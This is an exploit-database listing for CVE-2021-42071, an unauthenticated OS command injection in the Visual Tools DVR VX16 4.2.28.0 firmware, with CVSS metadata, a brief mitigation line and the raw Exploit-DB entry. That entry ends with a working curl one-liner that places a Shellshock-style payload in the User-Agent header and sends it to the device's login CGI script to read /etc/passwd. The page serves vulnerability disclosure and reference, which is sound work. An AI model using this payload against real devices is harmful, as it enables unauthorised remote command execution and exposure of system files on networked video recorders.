header-logo
Suggest Exploit
vendor:
VX16
by:
Andrea D'Ubaldo
9,8
CVSS
CRITICAL
OS Command Injection
78
CWE
Product Name: VX16
Affected Version From: Visual Tools VX16 v4.2.28.0
Affected Version To: Visual Tools VX16 v4.2.28.0
Patch Exists: YES
Related CWE: CVE-2021-42071
CPE: 2.6.35.4
Metasploit: N/A
Other Scripts: N/A
Tags: edb,cve,cve2021,visualtools,rce,oast,injection
CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Nuclei Metadata: {'max-request': 1, 'vendor': 'visual-tools', 'product': 'dvr_vx16_firmware'}
Platforms Tested: VX16 Embedded Linux 2.6.35.4
2021

Visual Tools DVR VX16 4.2.28.0 – OS Command Injection (Unauthenticated)

Visual Tools DVR VX16 4.2.28.0 could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in system commands.
Source

Exploit-DB raw data:

# Exploit Title: Visual Tools DVR VX16 4.2.28.0 - OS Command Injection (Unauthenticated)
# Date: 2021-07-05
# Exploit Author: Andrea D'Ubaldo
# Vendor Homepage: https://visual-tools.com/
# Version: Visual Tools VX16 v4.2.28.0
# Tested on: VX16 Embedded Linux 2.6.35.4.
# CVE: CVE-2021-42071
# Reference: https://www.swascan.com/security-advisory-visual-tools-dvr-cve-2021-42071/

# An unauthenticated remote attacker can inject arbitrary commands to CGI script that can result in remote command execution.

curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd' bash -s :'' http:/DVR_ADDR/cgi-bin/slogin/login.py